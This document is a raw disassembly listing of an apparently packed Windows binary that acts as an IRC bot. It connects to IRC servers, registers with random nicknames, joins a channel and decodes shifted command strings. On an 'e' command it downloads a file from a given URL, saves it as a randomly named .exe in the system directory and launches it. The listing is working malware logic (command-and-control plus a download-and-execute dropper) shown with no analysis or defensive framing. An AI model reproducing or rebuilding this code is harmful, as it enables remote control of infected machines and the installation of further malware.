xor eax, eax
and ecx, 3
mov [esp+0ACh+var_98], 1
rep movsb
mov ecx, dword_404AF8
mov edi, offset loc_404120
mov [esp+0ACh+arg_11EC], ecx
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
mov [esp+0ACh+arg_11F0], edx
mov edx, ecx
mov esi, offset loc_404120
lea edi, [esp+0ACh+arg_11FC]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
lea esi, [esp+0ACh+arg_4541]
loc_401BAF: ; CODE XREF: sub_4016F0+4D5�j
mov cl, [esp+eax+0ACh+arg_6D4]
inc eax
mov [esi-1], cl
mov byte ptr [esi], 0
add esi, 2
cmp eax, 0DACh
jl short loc_401BAF
mov ecx, 714h
mov eax, 31313131h
lea edi, [esp+0ACh+arg_609C]
mov [esp+0ACh+arg_6098], 0
rep stosd
stosw
mov ecx, 714h
mov eax, 31313131h
lea edi, [esp+0ACh+arg_2468]
mov [esp+0ACh+arg_6099], 0
rep stosd
stosw
jmp loc_4019AF
; ---------------------------------------------------------------------------
loc_401C06: ; CODE XREF: sub_4016F0+368�j
mov ecx, 1Fh
mov esi, offset dword_404788
lea edi, [esp+120h+arg_1410]
push 0
rep movsd
mov ecx, 1F4h
lea esi, [esp+124h+arg_660]
lea edi, [esp+124h+arg_148C]
lea eax, [esp+124h+arg_1410]
rep movsd
mov ecx, 24h
mov esi, offset off_404808
lea edi, [esp+124h+arg_1C5C]
push 0CF8h
push eax
push ebp
rep movsd
mov [esp+130h+arg_2107], 0
call dword_40115C ; send
loc_401C5F: ; CODE XREF: sub_4016F0+425�j
push 0C8h
call ebx ; Sleep
mov [esp+134h+var_11C], 0
loc_401C6E: ; CODE XREF: sub_4016F0+1CC�j
; sub_4016F0+1FD�j ...
push 2
push ebp
call dword_40113C ; shutdown
loc_401C77: ; CODE XREF: sub_4016F0+182�j
push ebp
call dword_401154 ; closesocket
mov eax, [esp+140h+var_128]
pop edi
pop ebx
pop esi
pop ebp
add esp, 8214h
retn
; ---------------------------------------------------------------------------
loc_401C8D: ; CODE XREF: sub_4016F0+38�j
mov eax, esi
pop esi
pop ebp
add esp, 8214h
retn
sub_4016F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401CA0 proc near ; CODE XREF: sub_401D50+26�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 4
arg_4 = dword ptr 8
sub esp, 38h
mov ecx, 6
push ebx
push esi
push edi
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [esp+44h+var_38]
rep movsd
movsw
movsb
mov ecx, 6
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [esp+44h+var_1C]
rep movsd
movsw
movsb
mov edi, [esp+44h+arg_4]
test edi, edi
jge short loc_401CD7
add edi, 1Ah
loc_401CD7: ; CODE XREF: sub_401CA0+32�j
mov bl, [esp+44h+arg_0]
lea eax, [esp+44h+var_38]
movsx esi, bl
push esi
push eax
call sub_403790 ; strchr
add esp, 8
test eax, eax
jz short loc_401D0B
lea ecx, [esp+44h+var_38]
sub eax, ecx
mov ecx, 1Ah
add eax, edi
pop edi
cdq
idiv ecx
pop esi
pop ebx
mov al, [esp+edx+38h+var_38]
add esp, 38h
retn
; ---------------------------------------------------------------------------
loc_401D0B: ; CODE XREF: sub_401CA0+4E�j
lea edx, [esp+44h+var_1C]
push esi
push edx
call sub_403790 ; strchr
add esp, 8
test eax, eax
jz short loc_401D38
lea ecx, [esp+44h+var_1C]
sub eax, ecx
mov ecx, 1Ah
add eax, edi
pop edi
cdq
idiv ecx
pop esi
pop ebx
mov al, [esp+edx+38h+var_1C]
add esp, 38h
retn
; ---------------------------------------------------------------------------
loc_401D38: ; CODE XREF: sub_401CA0+7B�j
pop edi
mov al, bl
pop esi
pop ebx
add esp, 38h
retn
sub_401CA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D50 proc near ; CODE XREF: sub_402850+7D�p
; sub_402850+AD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
mov esi, [esp+0Ch+arg_8]
mov bl, [ebp+0]
test bl, bl
jz short loc_401DAF
push edi
mov edi, [esp+10h+arg_0]
loc_401D67: ; CODE XREF: sub_401D50+56�j
mov eax, esi
mov byte ptr [esp+10h+arg_0], bl
mov ecx, [esp+10h+arg_0]
inc ebp
neg eax
push eax
push ecx
call sub_401CA0
add esp, 8
mov [edi], al
inc edi
cmp bl, 61h
jl short loc_401D91
cmp bl, 7Ah
jg short loc_401D91
movsx esi, bl
sub esi, 61h
loc_401D91: ; CODE XREF: sub_401D50+34�j
; sub_401D50+39�j
cmp bl, 41h
jl short loc_401DA1
cmp bl, 5Ah
jg short loc_401DA1
movsx esi, bl
sub esi, 41h
loc_401DA1: ; CODE XREF: sub_401D50+44�j
; sub_401D50+49�j
mov bl, [ebp+0]
test bl, bl
jnz short loc_401D67
mov [edi], bl
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401DAF: ; CODE XREF: sub_401D50+10�j
mov edx, [esp+0Ch+arg_0]
pop esi
pop ebp
pop ebx
mov byte ptr [edx], 0
retn
sub_401D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401DC0 proc near ; CODE XREF: sub_402500+70�p
push esi
mov esi, ecx
push 20000h
call sub_403710
add esp, 4
mov [esi+2Ch], eax
mov eax, esi
pop esi
retn
sub_401DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401DE0 proc near ; CODE XREF: sub_402500+EB�p
; sub_402500+148�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push 27h
push eax
lea ecx, [esi+4]
push ecx
call dword_401090 ; lstrcpyn
mov edx, [esp+4+arg_4]
mov [esi+58h], edx
pop esi
retn 8
sub_401DE0 endp
; ---------------------------------------------------------------------------
align 10h
loc_401E00: ; CODE XREF: UPX0:004037E3�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_403730
mov ecx, [esi+2Ch]
push ecx
call sub_403730
add esp, 8
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401E20 proc near ; CODE XREF: sub_402500+106�p
; sub_402500+163�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
push edi
push 0
push 1
mov esi, ecx
push 2
call dword_401140 ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_402B60
mov cx, [esi+58h]
add esp, 4
lea edi, [esi+60h]
mov [esi+64h], eax
push ecx
mov word ptr [edi], 2
call dword_401144 ; htons
mov edx, [esi+5Ch]
push 10h
push edi
push edx
mov [esi+62h], ax
call dword_401138 ; connect
test eax, eax
jnz loc_40205A
mov ecx, [esi+5Ch]
push eax
mov eax, [esi+2Ch]
push 20000h
push eax
push ecx
call dword_401158 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_40205A
mov edx, [esi+2Ch]
mov ecx, esi
mov byte ptr [edx+eax], 0
mov eax, [esi+2Ch]
push eax
call sub_4020A0
lea ecx, [esp+148h+var_138]
push 9
push ecx
call sub_402AB0
mov ebp, dword_4010FC
lea edx, [esp+150h+var_138]
push edx
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov ebx, dword_4010B4
add esp, 14h
push 64h
call ebx ; Sleep
lea ecx, [esp+148h+var_12C]
push 0
push ecx
call dword_4010B0 ; lstrlen
push eax
mov eax, [esi+5Ch]
lea edx, [esp+14Ch+var_128]
push edx
push eax
call dword_40115C ; send
mov edi, [esp+148h+arg_0]
lea ecx, [esp+148h+var_12C]
push edi
push offset aNickS ; "NICK %s\r\n"
push ecx
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call ebx ; Sleep
lea edx, [esp+148h+var_12C]
push 0
push edx
call dword_4010B0 ; lstrlen
mov ecx, [esi+5Ch]
push eax
lea eax, [esp+14Ch+var_128]
push eax
push ecx
call dword_40115C ; send
mov edx, [esi+2Ch]
mov eax, [esi+5Ch]
push 0
push 20000h
push edx
push eax
call dword_401158 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_40205A
mov ecx, [esi+2Ch]
push 64h
mov byte ptr [ecx+eax], 0
call ebx ; Sleep
mov edx, [esi+2Ch]
mov ecx, esi
push edx
call sub_4020A0
mov eax, [esi+2Ch]
push offset aAlready ; "already"
push eax
call sub_403796 ; strstr
add esp, 8
test eax, eax
jz loc_402005
loc_401F7B: ; CODE XREF: sub_401E20+1DF�j
mov ecx, [esp+148h+arg_4]
push ecx
push edi
call sub_402AB0
push edi
lea edx, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push edx
call ebp ; wsprintfA
add esp, 14h
push 64h
call ebx ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call dword_4010B0 ; lstrlen
mov edx, [esi+5Ch]
lea ecx, [esp+148h+var_128]
push eax
push ecx
push edx
call dword_40115C ; send
mov eax, [esi+2Ch]
mov ecx, [esi+5Ch]
push 0
push 20000h
push eax
push ecx
call dword_401158 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_40205A
mov edx, [esi+2Ch]
mov ecx, esi
mov byte ptr [edx+eax], 0
mov eax, [esi+2Ch]
push eax
call sub_4020A0
mov ecx, [esi+2Ch]
push offset aAlready ; "already"
push ecx
call sub_403796 ; strstr
add esp, 8
test eax, eax
jnz loc_401F7B
loc_402005: ; CODE XREF: sub_401E20+155�j
mov edx, [esp+148h+arg_8]
lea eax, [esp+148h+var_12C]
push edx
push edi
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call ebx ; Sleep
lea ecx, [esp+148h+var_12C]
push 0
push ecx
call dword_4010B0 ; lstrlen
push eax
mov eax, [esi+5Ch]
lea edx, [esp+14Ch+var_128]
push edx
push eax
call dword_40115C ; send
mov ecx, [esi+2Ch]
mov edx, [esi+5Ch]
push 0
push 20000h
push ecx
push edx
call dword_401158 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_402076
loc_40205A: ; CODE XREF: sub_401E20+50�j
; sub_401E20+6F�j ...
mov eax, [esi+5Ch]
push eax
call dword_401154 ; closesocket
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 138h
retn 0Ch
; ---------------------------------------------------------------------------
loc_402076: ; CODE XREF: sub_401E20+238�j
mov ecx, [esi+2Ch]
mov byte ptr [ecx+eax], 0
mov edx, [esi+2Ch]
push edx
mov ecx, esi
call sub_4020A0
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 138h
retn 0Ch
sub_401E20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4020A0 proc near ; CODE XREF: sub_401E20+82�p
; sub_401E20+13D�p ...
var_190 = byte ptr -190h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
mov ebx, ecx
push eax
call sub_403796 ; strstr
add esp, 8
test eax, eax
jz short loc_402122
mov edi, dword_4010B0
lea esi, [eax+4]
push esi
call edi ; lstrlen
dec eax
cmp eax, 63h
jle short loc_4020E4
pop edi
pop esi
mov eax, 1
pop ebx
add esp, 190h
retn 4
; ---------------------------------------------------------------------------
loc_4020E4: ; CODE XREF: sub_4020A0+31�j
push eax
lea ecx, [esp+1A0h+var_190]
push esi
push ecx
call dword_401090 ; lstrcpyn
lea edx, [esp+19Ch+var_190]
lea eax, [esp+19Ch+var_12C]
push edx
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_4010FC ; wsprintfA
add esp, 0Ch
lea ecx, [esp+19Ch+var_12C]
push 0
push ecx
call edi ; lstrlen
push eax
mov eax, [ebx+5Ch]
lea edx, [esp+1A0h+var_128]
push edx
push eax
call dword_40115C ; send
loc_402122: ; CODE XREF: sub_4020A0+1F�j
pop edi
pop esi
xor eax, eax
pop ebx
add esp, 190h
retn 4
sub_4020A0 endp
; =============== S U B R O U T I N E =======================================
sub_402130 proc near ; CODE XREF: sub_402500+186�p
; sub_402500+1A8�p
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
sub esp, 12Ch
lea eax, [esp+12Ch+var_12C]
push ebx
mov ebx, [esp+130h+arg_0]
push esi
push edi
push ebx
push offset aJoinS ; "JOIN %s\r\n"
mov esi, ecx
push eax
call dword_4010FC ; wsprintfA
mov edi, dword_4010B4
add esp, 0Ch
push 64h
call edi ; Sleep
lea ecx, [esp+138h+var_12C]
push 0
push ecx
call dword_4010B0 ; lstrlen
push eax
mov eax, [esi+5Ch]
lea edx, [esp+13Ch+var_128]
push edx
push eax
call dword_40115C ; send
push 64h
call edi ; Sleep
mov ecx, [esi+2Ch]
mov edx, [esi+5Ch]
push 0
push 20000h
push ecx
push edx
call dword_401158 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
mov byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_402220
test eax, eax
jz short loc_402220
push 64h
call edi ; Sleep
mov edx, [esi+2Ch]
mov ecx, esi
push edx
call sub_4020A0
mov eax, [esi+2Ch]
push offset a451 ; "451"
push eax
call sub_403796 ; strstr
add esp, 8
test eax, eax
jz short loc_4021DF
pop edi
pop esi
mov eax, 3
pop ebx
add esp, 12Ch
retn 4
; ---------------------------------------------------------------------------
loc_4021DF: ; CODE XREF: sub_402130+9C�j
mov ecx, [esi+2Ch]
push offset aPing ; "PING"
push ecx
call sub_403796 ; strstr
add esp, 8
test eax, eax
jz short loc_402205
pop edi
pop esi
mov eax, 4
pop ebx
add esp, 12Ch
retn 4
; ---------------------------------------------------------------------------
loc_402205: ; CODE XREF: sub_402130+C2�j
push 23h
add esi, 30h
push ebx
push esi
call dword_401090 ; lstrcpyn
pop edi
pop esi
xor eax, eax
pop ebx
add esp, 12Ch
retn 4
; ---------------------------------------------------------------------------
loc_402220: ; CODE XREF: sub_402130+74�j
; sub_402130+78�j
pop edi
pop esi
mov eax, 2
pop ebx
add esp, 12Ch
retn 4
sub_402130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402240 proc near ; CODE XREF: sub_4022B0+93�p
; sub_402500+1DF�p ...
var_14C = byte ptr -14Ch
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
sub esp, 14Ch
push esi
mov esi, ecx
call sub_403750 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [esp+154h+var_14C]
push eax
call sub_402AB0
lea ecx, [esp+158h+var_14C]
lea edx, [esp+158h+var_12C]
push ecx
push offset aQuitS ; "QUIT %s\r\n"
push edx
call dword_4010FC ; wsprintfA
add esp, 14h
lea eax, [esp+150h+var_12C]
push 0
push eax
call dword_4010B0 ; lstrlen
mov edx, [esi+5Ch]
lea ecx, [esp+150h+var_128]
push eax
push ecx
push edx
call dword_40115C ; send
mov eax, [esi+5Ch]
push eax
call dword_401154 ; closesocket
xor eax, eax
pop esi
add esp, 14Ch
retn
sub_402240 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022B0 proc near ; CODE XREF: sub_402500+1C9�p
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4022B0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 110h
push ebx
mov ebx, dword_4010B8
push esi
push edi
mov esi, ecx
mov [ebp+var_10], esp
mov [ebp+var_14], esi
call ebx ; GetTickCount
mov edi, [ebp+arg_0]
mov [ebp+var_18], eax
mov eax, [esi+5Ch]
mov [ebp+var_11C], 1
mov [ebp+var_118], eax
loc_4022FA: ; CODE XREF: sub_4022B0+12C�j
call sub_402BF0
test eax, eax
jz short loc_402348
push 0
push 0
lea ecx, [ebp+var_11C]
push 0
push ecx
push 1
call dword_401130 ; select
cmp eax, 0FFFFFFFFh
jz short loc_402348
mov [ebp+var_4], 0
call ebx ; GetTickCount
lea ecx, [edi+edi*2]
mov edx, [ebp+var_18]
sub eax, edx
lea ecx, [ecx+ecx*4]
lea ecx, [ecx+ecx*4]
lea ecx, [ecx+ecx*4]
lea edx, [ecx+ecx*4]
shl edx, 5
cmp eax, edx
jbe short loc_402367
mov ecx, esi
call sub_402240
loc_402348: ; CODE XREF: sub_4022B0+51�j
; sub_4022B0+6B�j ...
mov ecx, [esi+5Ch]
push ecx
call dword_401154 ; closesocket
xor eax, eax
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_402367: ; CODE XREF: sub_4022B0+8F�j
mov eax, [esi+2Ch]
mov ecx, [esi+5Ch]
push 0
push 20000h
push eax
push ecx
call dword_401158 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40239B
loc_402383: ; CODE XREF: UPX0:004023F4�j
; DATA XREF: sub_4023E1+D�o
mov ecx, [ebp+var_C]
pop edi
pop esi
mov eax, 1
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_40239B: ; CODE XREF: sub_4022B0+D1�j
mov edx, [esi+2Ch]
push 64h
mov byte ptr [eax+edx], 0
call dword_4010B4 ; Sleep
mov eax, [esi+2Ch]
mov ecx, esi
push eax
call sub_4020A0
mov ecx, [esi+2Ch]
push ecx
mov ecx, esi
call sub_402850
mov [ebp+var_4], 0FFFFFFFFh
call sub_402BF0
test eax, eax
jz loc_402348
push 64h
call dword_4010B4 ; Sleep
jmp loc_4022FA
sub_4022B0 endp
; =============== S U B R O U T I N E =======================================
sub_4023E1 proc near ; DATA XREF: UPX0:0040384C�o
mov edx, [ebp-14h]
mov eax, [edx+5Ch]
push eax
call dword_401154 ; closesocket
mov eax, offset loc_402383
retn
sub_4023E1 endp
; ---------------------------------------------------------------------------
jmp short loc_402383
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402400 proc near ; CODE XREF: sub_402850+132�p
; sub_402850+172�p
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 12Ch
push ebx
mov ebx, [esp+130h+arg_0]
push ebp
push esi
mov esi, dword_4010B0
push edi
mov edi, ecx
push ebx
call esi ; lstrlen
mov ebp, eax
mov eax, [esp+13Ch+arg_4]
push eax
call esi ; lstrlen
add ebp, eax
cmp ebp, 10Eh
jle short loc_402444
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 12Ch
retn 8
; ---------------------------------------------------------------------------
loc_402444: ; CODE XREF: sub_402400+30�j
mov ecx, [esp+13Ch+arg_4]
lea edx, [esp+13Ch+var_12C]
push ecx
push ebx
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push edx
call dword_4010FC ; wsprintfA
add esp, 10h
push 64h
call dword_4010B4 ; Sleep
lea eax, [esp+13Ch+var_12C]
push 0
push eax
call esi ; lstrlen
mov edx, [edi+5Ch]
lea ecx, [esp+13Ch+var_128]
push eax
push ecx
push edx
call dword_40115C ; send
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 12Ch
retn 8
sub_402400 endp
; =============== S U B R O U T I N E =======================================
sub_402490 proc near ; CODE XREF: sub_402500+9B�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 10h
lea eax, [esp+10h+var_10]
push eax
call dword_401080 ; GetSystemTime
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_14+2]
and eax, 0FFFFh
and edx, 0FFFFh
lea ecx, [eax+eax*2]
mov eax, [esp+14h+var_E]
add ecx, edx
and eax, 0FFFFh
add ecx, eax
push ecx
call sub_4037B0 ; srand
mov eax, [esp+14h+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_402AB0
mov ecx, [esp+1Ch+arg_4]
push 8
push ecx
call sub_402AB0
call sub_403750 ; rand
cdq
mov ecx, 1Ah
idiv ecx
mov eax, [esp+24h+arg_8]
mov [eax], edx
call sub_402A30
add esp, 24h
retn
sub_402490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402500 proc near ; DATA XREF: UPX0:00402E4F�o
var_DC = byte ptr -0DCh
var_D0 = byte ptr -0D0h
var_9C = byte ptr -9Ch
var_7C = byte ptr -7Ch
var_4 = dword ptr -4
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_402500
push eax
mov large fs:0, esp
sub esp, 0D0h
push ebx
push esi
push edi
call sub_402A30
call sub_403750 ; rand
and eax, 80000003h
jns short loc_402534
dec eax
or eax, 0FFFFFFFCh
inc eax
loc_402534: ; CODE XREF: sub_402500+2D�j
add eax, 4
push eax
lea eax, [esp+0ECh+var_D0]
push eax
call sub_402AB0
mov eax, ds:dword_405000
mov esi, dword_4010BC
add esp, 8
test eax, eax
jz short loc_402560
lea ecx, [esp+0E8h+var_D0]
push offset a_ ; "_"
push ecx
call esi ; lstrcat
loc_402560: ; CODE XREF: sub_402500+52�j
lea edx, [esp+0E8h+var_D0]
push offset a7 ; "7"
push edx
call esi ; lstrcat
lea ecx, [esp+0E8h+var_7C]
call sub_401DC0
mov edi, dword_4010B4
mov ebx, dword_4010B0
mov [esp+0E8h+var_4], 0
loc_40258C: ; CODE XREF: sub_402500+1D5�j
; sub_402500+206�j
push offset dword_404F9C
lea eax, [esp+0ECh+var_DC]
push offset dword_404FA0
push eax
call sub_402490
add esp, 0Ch
call sub_402BF0
test eax, eax
jnz short loc_4025BC
loc_4025AC: ; CODE XREF: sub_402500+BA�j
push 3E8h
call edi ; Sleep
call sub_402BF0
test eax, eax
jz short loc_4025AC
loc_4025BC: ; CODE XREF: sub_402500+AA�j
call sub_403750 ; rand
cdq
mov ecx, 7
idiv ecx
add edx, 5
push edx
lea edx, [esp+0ECh+var_9C]
push edx
call sub_402AB0
add esp, 8
mov esi, offset off_404B14
loc_4025DF: ; CODE XREF: sub_402500+118�j
mov eax, [esi]
push 1A0Bh
push eax
lea ecx, [esp+0F0h+var_7C]
call sub_401DE0
lea ecx, [esp+0E8h+var_9C]
lea edx, [esp+0E8h+var_D0]
push ecx
push edx
call ebx ; lstrlen
push eax
lea eax, [esp+0F0h+var_D0]
push eax
lea ecx, [esp+0F4h+var_7C]
call sub_401E20
test eax, eax
jz short loc_402674
add esi, 4
cmp esi, offset off_404B1C
jl short loc_4025DF
xor esi, esi
loc_40261C: ; CODE XREF: sub_402500+170�j
call sub_402BF0
test eax, eax
jz loc_4026E4
push 1A0Bh
call sub_403750 ; rand
xor edx, edx
mov ecx, 0Dh
div ecx
lea ecx, [esp+0ECh+var_7C]
mov edx, off_404B14[edx*4]
push edx
call sub_401DE0
lea eax, [esp+0E8h+var_9C]
lea ecx, [esp+0E8h+var_D0]
push eax
push ecx
call ebx ; lstrlen
lea edx, [esp+0ECh+var_D0]
push eax
push edx
lea ecx, [esp+0F4h+var_7C]
call sub_401E20
test eax, eax
jz short loc_402674
inc esi
cmp esi, 34h
jb short loc_40261C
jmp short loc_4026E4
; ---------------------------------------------------------------------------
loc_402674: ; CODE XREF: sub_402500+10D�j
; sub_402500+16A�j
call sub_402BF0
test eax, eax
jz short loc_4026E4
lea eax, [esp+0E8h+var_DC]
lea ecx, [esp+0E8h+var_7C]
push eax
call sub_402130
test eax, eax
jz short loc_4026B1
loc_40268F: ; CODE XREF: sub_402500+1AF�j
push 3E8h
call edi ; Sleep
call sub_402BF0
test eax, eax
jz short loc_4026B1
lea ecx, [esp+0E8h+var_DC]
push ecx
lea ecx, [esp+0ECh+var_7C]
call sub_402130
test eax, eax
jnz short loc_40268F
loc_4026B1: ; CODE XREF: sub_402500+18D�j
; sub_402500+19D�j
call sub_403750 ; rand
cdq
mov ecx, 320h
idiv ecx
lea ecx, [esp+0E8h+var_7C]
add edx, 578h
push edx
call sub_4022B0
call sub_402BF0
test eax, eax
jz loc_40258C
lea ecx, [esp+0E8h+var_7C]
call sub_402240
loc_4026E4: ; CODE XREF: sub_402500+123�j
; sub_402500+172�j ...
call sub_403750 ; rand
cdq
mov ecx, 0Ah
idiv ecx
lea eax, [edx+edx*2]
lea eax, [eax+eax*4]
lea eax, [eax+eax*4]
lea eax, [eax+eax*4]
lea edx, [eax+eax*4]
shl edx, 5
push edx
call edi ; Sleep
jmp loc_40258C
sub_402500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402710 proc near ; CODE XREF: sub_402850+106�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 4
sub esp, 10Ch
push ebx
push esi
push edi
push 0
push 0
push 0
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_40110C ; InternetOpenA
mov ebx, eax
test ebx, ebx
jnz short loc_402741
pop edi
pop esi
mov eax, 1
pop ebx
add esp, 10Ch
retn
; ---------------------------------------------------------------------------
loc_402741: ; CODE XREF: sub_402710+20�j
lea eax, [esp+118h+var_104]
push 104h
push eax
call dword_401098 ; GetSystemDirectoryA
mov esi, dword_4010BC
lea ecx, [esp+118h+var_104]
push offset asc_404D28 ; "\\"
push ecx
call esi ; lstrcat
lea edx, [esp+118h+var_104]
push 6
push edx
call dword_4010B0 ; lstrlen
lea eax, [esp+eax+120h+var_108]
push eax
call sub_402AB0
add esp, 8
lea ecx, [esp+11Ch+var_108]
push offset a_exe ; ".exe"
push ecx
call esi ; lstrcat
push 0
push 0
push 2
push 0
push 0
lea edx, [esp+12Ch+var_104]
push 40000000h
push edx
call dword_40108C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4027B9
pop edi
pop esi
mov eax, 2
pop ebx
add esp, 10Ch
retn
; ---------------------------------------------------------------------------
loc_4027B9: ; CODE XREF: sub_402710+98�j
mov eax, [esp+118h+arg_0]
push 0
push 0
push 0
push 0
push eax
push ebx
call dword_401104 ; InternetOpenUrlA
mov ebx, eax
test ebx, ebx
jnz short loc_4027EC
push edi
call dword_401084 ; CloseHandle
pop edi
pop esi
mov eax, 3
pop ebx
add esp, 10Ch
retn
; ---------------------------------------------------------------------------
loc_4027EC: ; CODE XREF: sub_402710+C4�j
push 100000h
call sub_403710
add esp, 4
lea ecx, [esp+118h+var_10C]
mov esi, eax
push ecx
push 100000h
push esi
push ebx
call dword_401108 ; InternetReadFile
mov eax, [esp+118h+var_10C]
lea edx, [esp+118h+var_108]
push 0
push edx
push eax
push esi
push edi
call dword_401088 ; WriteFile
push edi
call dword_401084 ; CloseHandle
lea ecx, [esp+118h+var_104]
push 5
push ecx
call sub_402AF0
push esi
call sub_403730
add esp, 0Ch
xor eax, eax
pop edi
pop esi
pop ebx
add esp, 10Ch
retn
sub_402710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402850 proc near ; CODE XREF: sub_4022B0+10B�p
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub esp, 264h
push ebx
push ebp
push esi
push edi
push offset dword_404FA0
mov ebp, ecx
push eax
call sub_403796 ; strstr
add esp, 8
mov ebx, eax
call dword_4010B8 ; GetTickCount
sub eax, dword_404FC0
cmp eax, 927C0h
jbe short loc_40288D
mov dword_404F98, 0
loc_40288D: ; CODE XREF: sub_402850+31�j
test ebx, ebx
jz loc_4029F2
push ebx
call dword_4010B0 ; lstrlen
cmp eax, 0Ah
jle loc_4029F2
lea edi, [ebx+8]
push 7Ch
push edi
call sub_403790 ; strchr
mov esi, eax
add esp, 8
test esi, esi
jz loc_4029F2
mov byte ptr [esi], 0
mov ecx, dword_404F9C
push ecx
lea edx, [esp+278h+var_200]
push edi
push edx
call sub_401D50
mov byte ptr [esi], 7Ch
inc esi
push 7Ch
push esi
call sub_403790 ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_4029F2
mov byte ptr [edi], 0
mov eax, dword_404F9C
push eax
lea ecx, [esp+278h+var_100]
push esi
push ecx
call sub_401D50
mov esi, dword_4010C4
add esp, 0Ch
lea edx, [esp+274h+var_200]
push offset aE ; "e"
push edx
call esi ; lstrcmp
test eax, eax
jnz short loc_402987
push ebx
call dword_4010B0 ; lstrlen
cmp eax, 0FFh
jge short loc_402987
mov eax, dword_404F98
test eax, eax
jnz short loc_402987
push ebx
push offset dword_404E98
call dword_401074 ; lstrcpy
push offset asc_404D7C ; "|"
push offset dword_404E98
call dword_4010BC ; lstrcat
lea eax, [esp+274h+var_100]
push eax
call sub_402710
add esp, 4
